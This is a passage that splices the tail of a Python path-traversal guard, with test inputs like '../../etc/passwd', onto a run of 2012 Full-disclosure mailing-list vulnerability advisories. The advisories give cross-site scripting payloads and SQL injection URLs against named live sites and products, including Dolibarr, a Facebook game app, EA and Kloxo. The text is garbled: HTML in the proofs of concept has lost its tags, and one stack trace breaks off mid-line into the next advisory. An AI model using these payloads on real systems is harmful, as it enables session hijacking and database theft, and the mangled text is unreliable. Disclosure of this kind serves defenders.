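    parameter. Look it up; anything not in the map is refused, not guessed."""
    pages = ALLOWED_SECTIONS.get(sec)
    if not pages or sec2 not in pages:
        return None
    return "%s/%s.php" % (sec, sec2)


def resolve_download(base_dir, modulepart, name):
    """document.php?modulepart=...&file=...: after joining and canonicalising,
    the result must still be under the module directory. realpath also follows
    symlinks, so a link that points outside the tree is rejected as well."""
    if not name:
        return None
    base_real = os.path.realpath(base_dir)
    module_root = os.path.realpath(os.path.join(base_real, modulepart))
    if os.path.commonpath([base_real, module_root]) != base_real:
        return None                       # modulepart itself tried to escape
    candidate = os.path.realpath(os.path.join(module_root, name))
    if candidate == module_root or os.path.commonpath([module_root, candidate]) != module_root:
        return None                       # ../ or an absolute path left the module dir
    return candidate


if __name__ == "__main__":
    base = "/srv/app/documents"           # assumed document root
    print(resolve_section("services", "edit"))                      # services/edit.php
    print(resolve_section("services", "../../etc/passwd"))          # None
    print(resolve_download(base, "project", "report.pdf"))          # inside the tree
    print(resolve_download(base, "project", "../../../../etc/passwd"))  # None
    print(resolve_download(base, "project", "/etc/passwd"))         # None
```

The containment check is a second line of defence, not a substitute for the allow-list: for includes (code execution) only the map approach is acceptable, because a traversal check still lets the attacker pick any PHP file under the web root.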
[Full-disclosure] OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities
Title:
======
OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities

Date:
=====
2012-02-08

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=426

VL-ID:
======
426

Introduction:
=============
Onxshop is not only a great CMS offering integrated in-context editing and full design freedom without the constraints of limiting templates, but it's also a stable ecommerce platform used in production environments since 2006.

Flexible layout modules, which support nesting based on the Fibonacci sequence. A complete HTML/CSS framework, which allows you to use the same HTML and core CSS for multiple websites with different branding and designs. A simplified MVC paradigm using Model = Storage Access (SQL and PHP), View = Presentation to client (simple HTML engine), Controller = Handling actions (request processing in PHP to produce View). To put it simply, you will not see the $align option in Model or Controller or the SQL query in Controller. A flexible routing system which allows each component to be called on its own (useful for AJAX). The option to rewrite each template, model or controller specifically for a project, so developers can add their own stamp to the system. Common components that are all built directly by our core team, which means that 99% of projects don't need to install external components. This eliminates problems with incompatible components (extensions/modules/plugins) which affect some CMS software. Behavioural targeting support in the core system and many other components. An all-in-one system - content management system, blog, product catalogue and checkout process all rolled into one. This allows users to share the same category system and media library across their product catalogue and blog articles, or include an "add to basket" button in blog posts about a product. There isn't any other web system in the universe which can do this with such ease. One fulltext search for the CMS, eCommerce and blog. Onxshop is a new kind of Content Management System (Shop|eCommerce). Onxshop is currently used by more than 50 businesses around the world, and that figure is growing all the time.

(Copy of the Vendor Homepage: http://onxshop.com/)

Abstract:
=========
Vulnerability-Lab Team discovered multiple web vulnerabilities on Onxshop's Content Management System v1.5.0.

Report-Timeline:
================
2012-02-09: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected on Onxshop's Content Management System v1.5.0. The bug allows a remote attacker to implement malicious script code on the application side (persistent). Successful exploitation of the vulnerability allows an attacker to manipulate modules/context (persistent) and can lead to session hijacking (user/mod/admin).

Vulnerable Module(s):
[+] Pages - Title
[+] Search - Keywords Inputs
[+] Vochou

Pictures:
../1.png
../2.png
../3.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with medium required user interaction. For demonstration or reproduce ...

1.
tr id=node_id_1194 tda onclick=openEdit('/popup/properties/1194/orig/page/88') href=javascript:void(1194) class=#8203;#8203;#8203;#8203;#8203;iframe a= = onload='alert(VulnerabilityLab)' src=a/td tdpage/default/td td0/td td0/td tddiv class=onxshop_page_propertiesa class=onxshop_delete title=Delete default href=#1194spanDelete/span/a/div/td/tr /tbody /table

2.
div id=breadCrumb a href=/reportsReports/a span style=font-size:8px;/spanspan class=location img src=http://www.vulnerability-lab.com/gfx/partners/vlab.png; onLoad=alert(1337);/span [X] /div

...or

option value=allAll Orders/option/select /span /divdiv class=row search span class=labellabelSearch query/label/span span class=field #8203;#8203;#8203;#8203;#8203;input width=800 type=text height=800 src=http://vulnerability-lab.com; iframe= value= name=order-list-filter[query] id=query/ //span/div div class=row registered_between span class=labellabelCreated between/label/span span class=field input width=800 type=text height=800 src=http://vulnerability-lab.com; iframe= value= name=order-list-filter[created_from] id=order-list-filter-created_from class=text hasDatepicker/ / input width=800 type=text height=800 src=http://vulnerability-lab.com; iframe= value= name=order-list-filter[created_to] id=order-list-filter-created_to class=text hasDatepicker/
[Full-disclosure] Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities
Title:
======
Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities

Date:
=====
2012-02-09

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=427

VL-ID:
======
427

Introduction:
=============
Dolibarr ERP CRM is a modern software to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It's an open-source free software designed for small and medium companies, foundations and freelancers. You can install, use and distribute it as a standalone application or as a web application (on a mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with any device (desktop, smartphone, tablet).

(Copy of the Vendor Homepage: http://www.dolibarr.org/)

Abstract:
=========
A Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on Dolibarr's CMS v3.2.0 Alpha.

Report-Timeline:
================
2011-02-09: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple remote SQL Injection vulnerabilities are detected on Dolibarr's Content Management System v3.2.0 Alpha. The vulnerability allows an attacker (remote) or a local low privileged user account to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms application compromise.

Vulnerable Module(s):
[+] Member List
[+] Row ID

--- Error/Exception Logs ---
Das System hat einen technischen Fehler festgestellt.
Diese Informationen könnten bei der Diagnose des Fehlers behilflich sein:
Datum: 20120209164847
Dolibarr: 3.2.0-alpha
Funktions-Level: 0
PHP: 5.2.4-2ubuntu5.19
Server: Apache
Angeforderte URL: /adherents/fiche.php?rowid=-1%27
Menüverwaltung: eldy_backoffice.php
Datenbanktyp-Verwaltung: mysql
Anfrage des letzten Datenbankzugriffs mit Fehler: SELECT d.rowid, d.civilite, d.prenom as firstname, d.nom as lastname, d.societe, d.fk_soc, d.statut, d.public, d.adresse as address, d.cp as zip, d.ville as town, d.note, d.email, d.phone, d.phone_perso, d.phone_mobile, d.login, d.pass, d.photo, d.fk_adherent_type, d.morphy, d.datec as datec, d.tms as datem, d.datefin as datefin, d.naiss as datenaiss, d.datevalid as datev, d.pays, d.fk_departement, p.rowid as country_id, p.code as country_code, p.libelle as country, dep.nom as state, dep.code_departement as state_code, t.libelle as type, t.cotisation as cotisation, u.rowid as user_id, u.login as user_login FROM llx_adherent_type as t, llx_adherent as d LEFT JOIN llx_c_pays as p ON d.pays = p.rowid LEFT JOIN llx_c_departements as dep ON d.fk_departement = dep.rowid LEFT JOIN llx_user as u ON d.rowid = u.fk_member WHERE d.fk_adherent_type = t.rowid AND d.entity = 1 AND d.rowid=-1\'
Return-Code des letzten Datenbankzugriffs mit Fehler: DB_ERROR_SYNTAX
Inhalt des letzten Datenbankzugriffs mit Fehler: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\'\' at line 1
Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\'\' at line 1

Picture(s):
../1.png
../2.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ...

1.1
1. Login to the Panel
2. Open the list.php
3. Include the following example string on the memberslist: -%20`

1.2
http://demo.dolibarr.org/adherents/fiche.php?rowid=-1%27[SQL Injection Vulnerability!]

Risk:
=====
The security risk of the sql injection vulnerabilities is estimated as high(+).

Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri & Ucha Gobejishvili
[Full-disclosure] Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities
Title:
======
Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities

Date:
=====
2012-02-06

VL-ID:
======
418

Abstract:
=========
Alexander Fuchs discovered 2 remote SQL Injection Vulnerabilities on the official website of Indianapolis Superbowl 2012 (US).

Status:
=======
Verified by Laboratory

Severity:
=========
High
[Full-disclosure] Linux Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities
Title:
======
Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities

Date:
=====
2012-02-10

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=429

VL-ID:
======
429

Introduction:
=============
Scriptable, distributed and object oriented Hosting Platform. Manage Clients, Resellers, Domains, Backups, Stats, Mails and Databases. Manage everything!

(Copy of the Vendor Homepage: http://www.lxcenter.org/)

Abstract:
=========
Vulnerability-Lab Team discovered multiple web vulnerabilities on Kloxo's LxCenter Server CP v6.1.10.

Report-Timeline:
================
2012-02-10: Public or Non-Public Disclosure

Status:
=======
Unpublished

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected on Kloxo's LxCenter Server CP v6.1.10. The bug allows a remote attacker to implement malicious script code on the application side (persistent). Successful exploitation of the vulnerability allows an attacker to manipulate modules/context (persistent) and can lead to session hijacking (user/mod/admin).

Vulnerable Module(s):
[+] LocalHost {Command Center}
[+] Server Information Verbose Settings

Picture(s):
../1.png
../2.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with medium required user interaction. For demonstration or reproduce ...

1.1 Localhost {Command Center}

script global_need_list = new Array(); /scriptscript global_match_list = new Array(); /scriptscript global_desc_list = new Array(); /scriptform onsubmit="return check_for_needed_variables('command_centerlocalhost');" method="post" enctype="multipart/form-data" action="/display.php" id="command_centerlocalhost" name="command_centerlocalhost" fieldset style="background-color: rgb(255, 255, 255); border: 0px none; padding: 10px;" width="90%"legend style=" font-weight: normal; border: 0px none;"font color="#303030" style="font-weight: bold;"Command Center for localhost /font /legend/fieldset div align="left" style="background-color: rgb(255, 255, 255); width: 90%;"div align=" left" style="width: 500px; border: 1px solid rgb(177, 192, 240);"input type="hidden" value="pserver" name="frm_o_o[0][class]"/ input type="hidden" value="localhost" name="frm_o_o[0][nname]"/ div align="left" style="padding: 10px; background-color: rgb(250, 248, 248); display: block;" Command br/ ...

or

input width="60%" type="text" value=" name="frm_pserver_c_ccenter_command" class="frm_pserver_c_ccenter_command textbox"/ iframe size="30" "=" [PERSISTENT SCRIPT CODE INJECT!]' src="a" /div div align=left style='padding:10 10 10 10 ;border-top :1px solid #aa; background-color:#ff;display:block' Output br textarea nowrap id=textarea_ class= frmtextarea rows=10 style='margin:0 0 0 50;width:85%;height:200px;' name=" size=30 /textarea script type="text/javascript"createTextAreaWithLines('textarea_');/script style

1.2 Server - Information - 2 x Verbose Input

font color="#303030" style="font-weight: bold;"Information for localhost /font /legend/fieldset div align="left" style="background-color: rgb(255, 255, 255); width: 90%;"div align="left" style="width: 500px; border: 1px solid rgb(177, 192, 240);"input type="hidden" value="pserver" name="frm_o_o[0][class]"/ input type="hidden" value="localhost" name="frm_o_o[0][nname]"/ script global_need_list['frm_pserver_c_description'] = 'Verbose Description (to Identify)'; /script div align="left" style="padding: 10px; background-color: rgb(250, 248, 248); display: block;" Verbose Description (to Identify) font color="red"sup*/sup/font br/ input width="60%" type="text" [PERSISTENT SCRIPT CODE INJECT!]" iframe=" value=" " name="frm_pserver_c_description" class="frm_pserver_c_description textbox"/" size="30" /div div align="left" style=" padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(255, 255, 255); display: block;" FQDN Hostname br/ input width="60%" type="text" [PERSISTENT SCRIPT CODE INJECT!]" iframe=" value= name="frm_pserver_c_realhostname" class=" frm_pserver_c_realhostname textbox"/" size="30" /div div align="left" style="padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(250, 248, 248); display: block;" Load Threshold At Which Warning Is Sent br/ input width="60%" type="text" size="30" value="20" name="frm_pserver_c_load_threshold" class="frm_pserver_c_load_threshold textbox"/ /div input type="hidden" value="update" name="frm_action"/ input type="hidden" value="information" name="frm_subaction"/

Reference(s):
../command-center.txt
[Full-disclosure] Sun Microsystems (Print) - Cross Site Scripting Vulnerability
Title:
======
Sun Microsystems (Print) - Cross Site Scripting Vulnerability

Date:
=====
2012-02-01

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=404

VL-ID:
======
404

Introduction:
=============
Sun Microsystems, Inc. was a company that sold computers, computer components, computer software, and information technology services. Sun was founded on February 24, 1982. At its height, Sun headquarters were in Santa Clara, California (part of Silicon Valley), on the former west campus of the Agnews Developmental Center. On January 27, 2010, Sun was acquired by Oracle Corporation for US$7.4 billion, based on an agreement signed on April 20, 2009. The following month, Sun Microsystems, Inc. was merged with Oracle USA, Inc. to become Oracle America, Inc. Sun products included computer servers and workstations based on its own SPARC processors as well as AMD's Opteron and Intel's Xeon processors; storage systems; and a suite of software products including the Solaris operating system, developer tools, Web infrastructure software, and identity management applications. Other technologies included the Java platform, MySQL, and NFS. Sun was a proponent of open systems in general and Unix in particular, and a major contributor to open source software. Sun's main manufacturing facilities were located in Hillsboro, Oregon and Linlithgow, Scotland.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Sun_Microsystems)

Java technology is a collection of specifications originally developed by Sun that define, on the one hand, the Java programming language and, on the other, various runtime environments for computer programs. These programs are usually written in Java. Java technology consists of the following components: the Java programming language, for formulating programs; the "Open Java Development Kit", a development tool containing fundamental parts such as a compiler and libraries; and the Java Runtime Environment, a standardized software platform for executing the developed programs.

(Copy of the Homepage: http://de.wikipedia.org/wiki/Java_%28Technik%29)

Abstract:
=========
Vulnerability-Lab Team discovered a high priority Cross Site Scripting Vulnerability on different sections of the java sun vendor service.

Report-Timeline:
================
2012-01-31: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple client side cross site scripting vulnerabilities are detected on the sun.com website of the java and developer portal. Successful exploitation of the vulnerability allows session hijacking, client side phishing and client side context manipulation.

Vulnerable Module(s):
[+] PrintPage.jsp

Proof of Concept:
=================
The cross site scripting vulnerability can be exploited by remote attackers with medium required user interaction. For demonstration or reproduce ...

Java.COM
table border=0 cellpadding=0 cellspacing=0 width=100% tbodytr td width=100%div class=breadcrumb[Cross Site Scripting]/div/td/tr/tbody/table/body/html

Sun.COM
body leftmargin=0 topmargin=0 rightmargin=10 bgcolor=#ff marginheight=0 marginwidth=0 a name=top/a div class=vnv1sunlogoa href=http://www.sun.com/;img src=PrintPage.jsp_files/vnv1_sunlogo.htm alt=sun.com border=0 height=24 width=55/a/div table border=0 cellpadding=0 cellspacing=0 width=100% tbodytr td width=100%div class=breadcrumb[Cross Site Scripting]/div/td/tr/tbody/table/body/html

Reference(s):
http://developers.sun.com/jsp_utils/PrintPage.jsp?url=[Cross Site Scripting]
http://java.sun.com/jsp_utils/PrintPage.jsp?url=[Cross Site Scripting]

Download(s):
../sun.zip
../java.zip

Risk:
=====
The security risk of the cross site scripting vulnerabilities is estimated as medium(-).

Credits:
========
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x)
[Full-disclosure] Electronic Arts - Cross Site Scripting Vulnerability
Title:
======
Electronic Arts - Cross Site Scripting Vulnerability

Date:
=====
2012-02-06

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=367

VL-ID:
======
367

Introduction:
=============
Electronic Arts, Inc. (EA) (NASDAQ: EA) is a major American developer, marketer, publisher and distributor of video games. Founded and incorporated on May 28, 1982 by Trip Hawkins, the company was a pioneer of the early home computer games industry and was notable for promoting the designers and programmers responsible for its games. It is one of the largest video game publishers in the world. Originally, EA was a home computing game publisher. In the late 1980s, the company began developing games in-house and supported consoles by the early 1990s. EA later grew via acquisition of several successful developers. By the early 2000s, EA had become one of the world's largest third-party publishers. On May 4, 2011, EA reported $3.8 billion in revenues for the fiscal year ending March 2011. EA began to move toward direct distribution of digital games and services with the acquisition of the popular online gaming site Pogo.com in 2001. In 2009, EA acquired the London-based social gaming startup Playfish, and in June 2011, EA launched Origin, an online service to sell downloadable games directly to consumers. In July 2011, EA announced that it had acquired PopCap Games, the company behind hits such as Plants vs. Zombies and Bejeweled.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Electronic_Arts)

Abstract:
=========
A Vulnerability-Lab researcher discovered a non persistent (client side) cross site scripting vulnerability on the Electronic Arts website.

Report-Timeline:
================
2011-12-22: Vendor Notification 1
2012-01-06: Vendor Notification 2
2012-02-02: Vendor Notification 3
2011-**-**: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2011-02-06: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Low

Details:
========
A non persistent cross site scripting vulnerability is detected on the Electronic Arts Website. The vulnerability allows a remote attacker with required user interaction to hijack customer sessions via cross site scripting. Successful exploitation can result in account theft, client side phishing or session hijacking.

Vulnerable Module(s):
[+] Search

Picture(s):
../1.png

Proof of Concept:
=================
The vulnerability can be exploited by a remote attacker with required user interaction. For demonstration or reproduce ...

Note: To reproduce the issue include the script code on the search engine input field.

PoC: <script>alert('Cross Site Scripting')</script>

Reference(s):
https://help.ea.com/en/origin?q=<script>alert('Cross Site Scripting')</script>

Risk:
=====
The security risk of the cross site scripting vulnerability is estimated as low(+).

Credits:
========
Vulnerability Research Laboratory - Sebastian Lüdtke (yak0n)
Re: [Full-disclosure] Vulnerability-lab.com XSS
I comment on your disinformation with 2 short links ...

article: http://www.vulnerability-lab.com/dev/?p=382
news: http://www.vulnerability-lab.com/news/get_news.php?id=74

... we will not respond to this crap anymore ... false envy. by ;)
[Full-disclosure] VolksBank Online Banking - Multiple Web Vulnerabilities
Title:
======
VolksBank Online Banking - Multiple Web Vulnerabilities

Date:
=====
2012-02-07

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=172

VL-ID:
======
172

Introduction:
=============
Volksbank AG takes a number of security precautions that provide effective protection against attacks during the transmission of data or its processing on the bank's server. Please also take precautions against unauthorized manipulation or interference by third parties, and report suspicious e-mails to us. On the following page, enter any number as the user number (Verfügernummer) and then click LOGIN to start the demo version.

(Copy of the Vendor Homepage: https://www.banking.co.at/appl/ebp/login.html?resource=074&demo=true)

Abstract:
=========
An anonymous Vulnerability Lab Researcher discovered multiple Web Vulnerabilities in the online-banking system of Volksbank.

Report-Timeline:
================
2011-07-03: Vendor Notification 1
2011-08-25: Vendor Notification 2
2011-11-17: Vendor Notification 3
2012-01-09: Vendor Notification 4
2011-**-**: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2011-02-07: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
1.1
Multiple Input Validation vulnerabilities are detected on the Volksbank portal banking website. Remote attackers can include malicious persistent script-codes on the application side of the vulnerable affected modules. The vulnerability also allows an attacker to hijack not expired customer sessions.

Vulnerable Module(s):
[+] Vorlagen Name
[+] Exception Handling
[+] Vorlagen Gruppen Name
[+] Default ASPX

--- Exception Logs ---
Error Page Exception
SRVE0260E: The server cannot use the error page specified for your application to handle the Original Exception printed below.
Original Exception:
Error Message: SRVE0295E: Error reported: 400
Error Code: 400
Target Servlet: /zib/de/include/search_ergebnisn.jsp
Error Stack:
com.ibm.ws.webcontainer.webapp.WebAppErrorReport: SRVE0295E: Error reported: 400
at java.lang.Throwable.(Throwable.java:67)
at javax.servlet.ServletException.(ServletException.java:72)
at com.ibm.websphere.servlet.error.ServletErrorReport.(ServletErrorReport.java:67)
at com.ibm.ws.webcontainer.webapp.WebAppDispatcherContext.sendError(WebAppDispatcherContext.java:600)
at com.ibm.ws.webcontainer.srt.SRTServletResponse.sendError(SRTServletResponse.java:1180)
at com.ibm.ws.webcontainer.srt.SRTServletResponse.sendError(SRTServletResponse.java:1162)
at at.co.arz.cms.hk010.volksbank.filter.ParameterValidationFilter.doFilter(ParameterValidationFilter.java:67)
at com.ibm.ws.webcontainer.filter.FilterInstanceWrapper.doFilter(FilterInstanceWrapper.java:188)
at com.ibm.ws.webcontainer.filter.WebAppFilterChain.doFilter(WebAppFilterChain.java:116)
at at.co.arz.cms.hk010.volksbank.filter.DomainBranchValidationFilter.doFilter(DomainBranchValidationFilter.java:124)
at com.ibm.ws.webcontainer.filter.FilterInstanceWrapper.doFilter(FilterInstanceWrapper.java:188)
at com.ibm.ws.webcontainer.filter.WebAppFilterChain.doFilter(WebAppFilterChain.java:116)
at com.ibm.ws.webcontainer.filter.WebAppFilterChain._doFilter(WebAppFilterChain.java:77)
at com.ibm.ws.webcontainer.filter.WebAppFilterManager.doFilter(WebAppFilterManager.java:908)
at com.ibm.ws.webcontainer.servlet.ServletWrapper.handleRequest(ServletWrapper.java:934)
at com.ibm.ws.webcontainer.servlet.ServletWrapper.handleRequest(ServletWrapper.java:502)
at com.ibm.ws.webcontainer.servlet.ServletWrapperImpl.handleRequest(ServletWrapperImpl.java:179)
at com.ibm.wsspi.webcontainer.servlet.GenericServletWrapper.handleRequest(GenericServletWrapper.java:121)
at com.ibm.ws.jsp.webcontainerext.AbstractJSPExtensionServletWrapper.handleRequest(AbstractJSPExtensionServletWrapper.java:241)
at com.ibm.ws.webcontainer.webapp.WebApp.handleRequest(WebApp.java:3826)
at com.ibm.ws.webcontainer.webapp.WebGroup.handleRequest(WebGroup.java:276)
at com.ibm.ws.webcontainer.WebContainer.handleRequest(WebContainer.java:931)
at com.ibm.ws.webcontainer.WSWebContainer.handleRequest(WSWebContainer.java:1583)
at com.ibm.ws.webcontainer.channel.WCChannelLink.ready(WCChannelLink.java:186)
at com.ibm.ws.http.channel.inbound.impl.HttpInboundLink.handleDiscrimination(HttpInboundLink.java:445)
at com.ibm.ws.http.channel.inbound.impl.HttpInboundLink.handleNewRequest(HttpInboundLink.java:504)
at
[Full-disclosure] eFronts Community++ v3.6.10 - Cross Site Vulnerability
Title:
eFronts Community++ v3.6.10 - Cross Site Vulnerability

Date:
2012-02-07

References:
http://www.vulnerability-lab.com/get_content.php?id=423

VL-ID:
423

Introduction:
Tailored with larger organizations in mind, eFront Community ++ offers solutions for the management of companies' most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Community ++ platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Community ++ builds on top of eFront Educational.

(Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-Community ++.html)

Abstract:
A Vulnerability Lab Researcher discovered a cross site scripting vulnerability on eFronts Community ++ v3.6.10 Application.

Report-Timeline:
2012-02-07: Public or Non-Public Disclosure

Status:
Published

Affected Products:
eFront
Product: Community ++ v3.6.10

Exploitation-Technique:
Remote

Severity:
Low

Details:
A non-persistent cross site scripting vulnerability is detected on eFronts Community++ application v3.6.10. The vulnerability allows a remote attacker to hijack customer/admin sessions with high required user interaction. Successful exploitation can result in account theft or client side context manipulation.

Vulnerable Module(s):
[+] filter=

Picture(s):
../6.png

Proof of Concept:
The vulnerability can be exploited by remote attackers with high required user interaction. For demonstration or reproduce ...

http://server.com/communityplusplus/www/administrator.php?ctg=languagesajax=languagesTable; limit=200offset=0sort=activeorder=ascother=filter=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VulnerabilityLab%22%29%20%3C

Reference(s):
../xss.txt

Risk:
The security risk of the non-persistent cross site scripting vulnerability is estimated as low(+).
Credits:
Vulnerability Research Laboratory - Chokri B.A. (Me!ster)

Disclaimer:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012 | Vulnerability-Lab

--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Facebook Game Store - SQL Injection Vulnerability
Title:
Facebook Game Store - SQL Injection Vulnerability

Date:
2012-02-04

References:
http://www.vulnerability-lab.com/get_content.php?id=408

VL-ID:
408

Introduction:
The application is currently included and viewable by all Facebook users. The service is an external 3rd party application sponsored by the Facebook Game Store Development Team.

(Copy from the Vendors Homepage: http://apps.facebook.com/game_store/)

Facebook is a social networking service and website launched in February 2004, operated and privately owned by Facebook, Inc. As of July 2011, Facebook has more than 750 million active users. Users may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Facebook users must register before using the site. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics.

(Copy of the Vendor Website: http://en.wikipedia.org/wiki/Facebook)

Abstract:
A Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on the 3rd party web application - Facebook Game Store (apps.facebook.com).

Report-Timeline:
2012-02-02: Vendor Notification
2012-02-02: Developer Notification
2012-02-04: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
High

Details:
A remote SQL Injection vulnerability is detected on the Facebook Game Store application (apps.facebook). The vulnerability allows an attacker (remote) to inject/execute their own SQL statements on the affected FB application DBMS.
Vulnerable Module(s):
[+] Game Store - Facebook 3rd Party Application

Vulnerable Param(s)/File(s):
[+] game_detail.php

Affected Application:
[+] apps.facebook.com/game_store/

--- SQL Error Logs ---
Heading Tabs Facebook User 06 December 11 04:41:pm user: test
--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near / at line 1

Picture(s):
../1.png

Proof of Concept:
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...

URL: http://apps.facebook.com/
Path: /game_store/
File: game_detail.php

Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]

PoC:
http://apps.facebook.com/game_store/game_detail.php?gameid=13959[SQL-Injection]Act=en[SQL-Injection]

Risk:
The security risk of the application SQL injection vulnerabilities is estimated as high(+).

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
[Full-disclosure] Dinama SMS Service - Persistent Web Vulnerability
Title:
Dinama SMS Service - Persistent Web Vulnerability

Date:
2012-02-05

References:
http://www.vulnerability-lab.com/get_content.php?id=417

VL-ID:
417

Introduction:
DINAMA's interactive media solutions enable two-way communication between the media and their public or audience.

(Copy of the Vendor Homepage: http://www.dinama.com/)

Abstract:
A Vulnerability Lab Researcher discovered a persistent remote web vulnerability on the DINAMA administration website (SMS|TV Service).

Report-Timeline:
2012-02-05: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Medium

Details:
Multiple persistent input validation vulnerabilities are detected on the DINAMA SMS Service. The vulnerability allows a remote attacker to hijack other accounts by sending a malicious SMS. Successful exploitation can result in account theft or execution of malicious persistent context.

Vulnerable Module(s):
[+] SMS - Topic

Picture(s):
../dinama1.png
../dinama2.png

Proof of Concept:
The vulnerability can be exploited by remote attackers with low required user interaction. For demonstration or reproduce ...

Include the following strings as SMS topic ...

scriptalert('vulnerabilitylab')/scriptdiv style=1 iframe src=http://www.vulnerability-lab.com

Risk:
The security risk of the persistent web vulnerability is estimated as medium(+).

Credits:
Vulnerability Research Laboratory - Ivan Montilla Miralles (eParanoidE)
[Full-disclosure] Video = Cyberoam Central Console v2.x - File Include Vulnerability
Title:
Cyberoam Central Console v2.x - File Include Vulnerability

Date:
2012-02-05

References:
Download: http://www.vulnerability-lab.com/resources/videos/411.wmv
View: http://www.youtube.com/watch?v=pGJy2XNugy8

VL-ID:
411

Status:
Published

Exploitation-Technique:
Offensive

Severity:
High

Details:
The video shows a live exploitation session by Benjamin Kunz Mejri. The video explains how to get access to a web telnet console via a file include vulnerability.

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri
[Full-disclosure] Video = Google Service Reward #1 - ClickJacking Vulnerability
Title:
Google Service Reward #1 - ClickJacking Vulnerability

Date:
2012-02-07

References:
Download: http://www.vulnerability-lab.com/resources/videos/416.wmv
View: http://www.youtube.com/watch?v=6N0YS9cTRHw

VL-ID:
416

Status:
Published

Exploitation-Technique:
Offensive

Severity:
High

Details:
The video shows the live exploitation session of Aditya Gupta, a Vulnerability Lab researcher from India, on a famous Google service. In January 2012 he got a reward + credits from the Google security team for the remotely exploitable security issue.

Credits:
Vulnerability Research Laboratory - Aditya Gupta
[Full-disclosure] HITB2011KUL - Post Memory Corruption Analysis
Title:
HITB2011KUL - Post Memory Corruption Analysis

Date:
2012-01-26

References:
Download: http://www.vulnerability-lab.com/resources/videos/398.wmv
View: http://www.youtube.com/watch?v=kOgarD9KCbg

VL-ID:
398

Status:
Published

Exploitation-Technique:
Conference

Severity:
High

Details:
In this presentation, we introduce a new exploitation methodology of invalid memory reads and writes, based on dataflow analysis after a memory corruption bug has occurred inside a running process. We will expose a methodology which shall help with writing a reliable exploit out of a PoC triggering an invalid memory write, in presence of security defense mechanisms such as compiler enhancements (full RELRO, SSP) or kernel anti-exploitation features (ASLR, NX).

In particular, we will demonstrate how to:
- Find all the function pointers inside a running process
- How to determine which ones would have been dereferenced after the crash
- Which ones are truncable (in particular with 0×).

In case all of the above fail, how to test for specific location overwrites in order to indirectly trigger a second vulnerability allowing greater control and eventually control flow hijacking. All of the above without source code, indeed ;)

